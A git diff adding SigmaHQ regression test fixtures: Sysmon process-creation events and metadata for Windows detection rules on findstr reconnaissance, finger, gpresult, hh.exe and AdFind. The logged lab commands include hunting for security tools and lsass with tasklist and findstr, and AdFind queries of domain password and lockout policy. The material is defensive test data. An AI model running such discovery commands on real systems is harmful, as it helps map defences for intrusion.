index 000000000..1f98e6f88 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_everyone/info.yml @@ -0,0 +1,13 @@ +id: bfab9c3b-5f4b-496c-aa6a-8870fec99738 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 47e4bab7-c626-47dc-967b-255608c9a920 + title: Permission Misconfiguration Reconnaissance Via Findstr.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_findstr_recon_everyone/47e4bab7-c626-47dc-967b-255608c9a920.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.evtx b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.evtx new file mode 100644 index 000000000..d47f2d833 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.json b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.json new file mode 100644 index 000000000..610578ece --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:51:29.178909Z" + } + }, + "EventRecordID": 9129415, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:51:29.168", + "ProcessGuid": "5AA13A44-D5E1-68FC-1131-000000004002", + "ProcessId": 3384, + "Image": "C:\\Windows\\System32\\cmd.exe", + "FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)", + "Description": "Windows Command Processor", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "Cmd.Exe", + "CommandLine": "cmd /c \"tasklist | findstr powershell\"", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/info.yml b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/info.yml new file mode 100644 index 000000000..2a5e7846c --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/info.yml @@ -0,0 +1,13 @@ +id: 5bb16f46-e370-4a40-a47a-d047e4482fc1 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: ccb5742c-c248-4982-8c5c-5571b9275ad3 + title: Recon Command Output Piped To Findstr.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.evtx b/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.evtx new file mode 100644 index 000000000..4793bbbe0 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.json b/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.json new file mode 100644 index 000000000..ce96c60fa --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.json @@ -0,0 +1,198 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:52:18.663980Z" + } + }, + "EventRecordID": 9145421, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:52:18.657", + "ProcessGuid": "5AA13A44-D612-68FC-1931-000000004002", + "ProcessId": 5144, + "Image": "C:\\Windows\\System32\\cmd.exe", + "FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)", + "Description": "Windows Command Processor", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "Cmd.Exe", + "CommandLine": "cmd /c \"tasklist | findstr virus\"", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:52:18.675229Z" + } + }, + "EventRecordID": 9145437, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:52:18.674", + "ProcessGuid": "5AA13A44-D612-68FC-1A31-000000004002", + "ProcessId": 6320, + "Image": "C:\\Windows\\System32\\tasklist.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Lists the current running tasks", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "tasklist.exe", + "CommandLine": "tasklist", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=A440302FCCCB6D181F8DB017265602397E1EB92A,MD5=2B05A9BDFAEAC5743B47A10F3F0A202B,SHA256=31E6A056EB1E722D8EC8C7E152E6A410B12D6055140BC38FFA1CCBD56AD4E623,IMPHASH=FCEA32ABE79C10DFACC88F5335DD89DE", + "ParentProcessGuid": "5AA13A44-D612-68FC-1931-000000004002", + "ParentProcessId": 5144, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "cmd /c \"tasklist | findstr virus\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:52:18.677359Z" + } + }, + "EventRecordID": 9145443, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:52:18.676", + "ProcessGuid": "5AA13A44-D612-68FC-1B31-000000004002", + "ProcessId": 9052, + "Image": "C:\\Windows\\System32\\findstr.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Find String (QGREP) Utility", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "FINDSTR.EXE", + "CommandLine": "findstr virus", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F", + "ParentProcessGuid": "5AA13A44-D612-68FC-1931-000000004002", + "ParentProcessId": 5144, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "cmd /c \"tasklist | findstr virus\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/info.yml b/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/info.yml new file mode 100644 index 000000000..f71546cde --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/info.yml @@ -0,0 +1,13 @@ +id: 4497a849-5942-4e5f-9de7-9c82c41e4ad9 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 4fe074b4-b833-4081-8f24-7dcfeca72b42 + title: Security Tools Keyword Lookup Via Findstr.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_finger_execution/af491bca-e752-4b44-9c86-df5680533dbc.evtx b/regression_data/windows/process_creation/proc_creation_win_finger_execution/af491bca-e752-4b44-9c86-df5680533dbc.evtx new file mode 100644 index 000000000..3c9cdf238 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_finger_execution/af491bca-e752-4b44-9c86-df5680533dbc.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_finger_execution/af491bca-e752-4b44-9c86-df5680533dbc.json b/regression_data/windows/process_creation/proc_creation_win_finger_execution/af491bca-e752-4b44-9c86-df5680533dbc.json new file mode 100644 index 000000000..744d48f49 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_finger_execution/af491bca-e752-4b44-9c86-df5680533dbc.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:47:36.346438Z" + } + }, + "EventRecordID": 12260122, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:47:36.344", + "ProcessGuid": "5AA13A44-0D38-68FD-B736-000000004002", + "ProcessId": 7732, + "Image": "C:\\Windows\\System32\\finger.exe", + "FileVersion": "10.0.20348.3451 (WinBuild.160101.0800)", + "Description": "TCPIP Finger Command", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "finger.exe", + "CommandLine": "finger", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=9DFF43AAF3833E42520A4E426F9132ECFC8A1138,MD5=F05FE1D85C1E9B37E27A78DE2A099977,SHA256=9C08862150B290F3834D02F9C2924C3E163B403AC4B00853BCB78B40E00DE6B5,IMPHASH=4EC5391C083809964BB61804E493A505", + "ParentProcessGuid": "5AA13A44-0BDF-68FD-7936-000000004002", + "ParentProcessId": 5232, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "cmd / c \"tasklist | findstr lsass\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_finger_execution/info.yml b/regression_data/windows/process_creation/proc_creation_win_finger_execution/info.yml new file mode 100644 index 000000000..92bb2d679 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_finger_execution/info.yml @@ -0,0 +1,13 @@ +id: 312cf7da-b126-4d53-afc7-01c96aa9710e +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: af491bca-e752-4b44-9c86-df5680533dbc + title: Finger.EXE Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_finger_execution/af491bca-e752-4b44-9c86-df5680533dbc.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_gpresult_execution/e56d3073-83ff-4021-90fe-c658e0709e72.evtx b/regression_data/windows/process_creation/proc_creation_win_gpresult_execution/e56d3073-83ff-4021-90fe-c658e0709e72.evtx new file mode 100644 index 000000000..08018ab79 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_gpresult_execution/e56d3073-83ff-4021-90fe-c658e0709e72.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_gpresult_execution/e56d3073-83ff-4021-90fe-c658e0709e72.json b/regression_data/windows/process_creation/proc_creation_win_gpresult_execution/e56d3073-83ff-4021-90fe-c658e0709e72.json new file mode 100644 index 000000000..c3f8fdc56 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_gpresult_execution/e56d3073-83ff-4021-90fe-c658e0709e72.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-27T00:09:41.570583Z" + } + }, + "EventRecordID": 33638020, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3380, + "ThreadID": 4420 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-27 00:09:41.563", + "ProcessGuid": "5AA13A44-B845-68FE-3702-000000004102", + "ProcessId": 9004, + "Image": "C:\\Windows\\System32\\gpresult.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "Query Group Policy RSOP Data", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "gprslt.exe", + "CommandLine": "gpresult /z", + "CurrentDirectory": "C:\\Program Files\\DTrace\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-B54F-68FE-E547-0C0000000000", + "LogonId": "0xc47e5", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=84DBEACB152615177EB5EE2AC4735B75186BC28F,MD5=80B679C92D709FF93DF2400966A5C183,SHA256=09F58BF0E2D334AAA7410AB613E71F4D1FD346ABEF010423020BD6C3A6C20195,IMPHASH=C853AD8534AC03E7AD69F32A5B0B1625", + "ParentProcessGuid": "5AA13A44-B6AD-68FE-FC01-000000004102", + "ParentProcessId": 10508, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_gpresult_execution/info.yml b/regression_data/windows/process_creation/proc_creation_win_gpresult_execution/info.yml new file mode 100644 index 000000000..598d7f998 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_gpresult_execution/info.yml @@ -0,0 +1,12 @@ +id: f0e9da0c-c305-4bcb-89e5-79621d0ba6d2 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: e56d3073-83ff-4021-90fe-c658e0709e72 + title: Gpresult Display Group Policy Information +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + path: regression_data/windows/process_creation/proc_creation_win_gpresult_execution/e56d3073-83ff-4021-90fe-c658e0709e72.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.evtx b/regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.evtx new file mode 100644 index 000000000..7dbd24531 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.json b/regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.json new file mode 100644 index 000000000..e56eec8aa --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-27T00:11:22.294854Z" + } + }, + "EventRecordID": 33639600, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3380, + "ThreadID": 4420 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-27 00:11:22.292", + "ProcessGuid": "5AA13A44-B8AA-68FE-3F02-000000004102", + "ProcessId": 7784, + "Image": "C:\\Windows\\hh.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Microsoft® HTML Help Executable", + "Product": "HTML Help", + "Company": "Microsoft Corporation", + "OriginalFileName": "HH.exe", + "CommandLine": "\"C:\\Windows\\hh.exe\" C:\\Windows\\IME\\IMETC\\HELP\\IMTCTC14.CHM", + "CurrentDirectory": "C:\\Windows\\IME\\IMETC\\HELP\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-B54F-68FE-E547-0C0000000000", + "LogonId": "0xc47e5", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=641EF54FAECFA4E912DB88075FD25AABDB233A79,MD5=44A6B0A791E00D169EC0FFCFF0A17EB3,SHA256=39811F6070E82E9AA67A4D3E6153A7CD70519DBBAC36067157C573E2F736AA9E,IMPHASH=D3D9C3E81A404E7F5C5302429636F04C", + "ParentProcessGuid": "5AA13A44-B55F-68FE-1A01-000000004102", + "ParentProcessId": 8100, + "ParentImage": "C:\\Program Files\\Everything\\Everything.exe", + "ParentCommandLine": "\"C:\\Program Files\\Everything\\Everything.exe\" -startup", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/info.yml b/regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/info.yml new file mode 100644 index 000000000..67ee105e9 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/info.yml @@ -0,0 +1,12 @@ +id: 627bc1e3-7961-4d77-96df-915627f8c3fc +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 68c8acb4-1b60-4890-8e82-3ddf7a6dba84 + title: HH.EXE Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + path: regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.evtx b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.evtx new file mode 100644 index 000000000..b5128f2c6 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.json b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.json new file mode 100644 index 000000000..64e79fdd7 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-23T09:37:40.974119Z" + } + }, + "EventRecordID": 650014, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3076, + "ThreadID": 4936 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "srv-01.midgardnet.tech", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-23 09:37:40.972", + "ProcessGuid": "14207D89-F764-68F9-2410-000000003F02", + "ProcessId": 4316, + "Image": "C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\AdFind.exe", + "FileVersion": "1.62.0.6172", + "Description": "-", + "Product": "AdFind", + "Company": "www.joeware.net", + "OriginalFileName": "AdFind.exe", + "CommandLine": "AdFind.exe -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties", + "CurrentDirectory": "C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\", + "User": "MIDGARDNET\\SwachchhandaP", + "LogonGuid": "14207D89-91E6-68F9-0F94-460000000000", + "LogonId": "0x46940f", + "TerminalSessionId": 2, + "IntegrityLevel": "Medium", + "Hashes": "MD5=B0C4A9C1D8C4641A161B3DBF111454DF,SHA256=484DD00E85C033FBFD506B956AC0ACD29B30F239755ED753A2788A842425B384,IMPHASH=680DAD9E300346E05A85023965867201", + "ParentProcessGuid": "14207D89-F57C-68F9-D70F-000000003F02", + "ParentProcessId": 6488, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "MIDGARDNET\\SwachchhandaP" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/info.yml b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/info.yml new file mode 100644 index 000000000..94621d03a --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/info.yml @@ -0,0 +1,13 @@ +id: de5c7702-3eb3-41be-ae33-b36a6f13d985 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 455b9d50-15a1-4b99-853f-8d37655a4c1b + title: PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/514e7e3e-b3b4-4a67-af60-be20f139198b.evtx b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/514e7e3e-b3b4-4a67-af60-be20f139198b.evtx new file mode 100644 index 000000000..474247e01 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/514e7e3e-b3b4-4a67-af60-be20f139198b.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/514e7e3e-b3b4-4a67-af60-be20f139198b.json b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/514e7e3e-b3b4-4a67-af60-be20f139198b.json new file mode 100644 index 000000000..c19f3d63d --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/514e7e3e-b3b4-4a67-af60-be20f139198b.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-23T09:30:03.278177Z" + } + }, + "EventRecordID": 649847, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3076, + "ThreadID": 4936 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "srv-01.midgardnet.tech", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-23 09:30:03.253", + "ProcessGuid": "14207D89-F59B-68F9-DB0F-000000003F02", + "ProcessId": 6504, + "Image": "C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\AdFind.exe", + "FileVersion": "1.62.0.6172", + "Description": "-", + "Product": "AdFind", + "Company": "www.joeware.net", + "OriginalFileName": 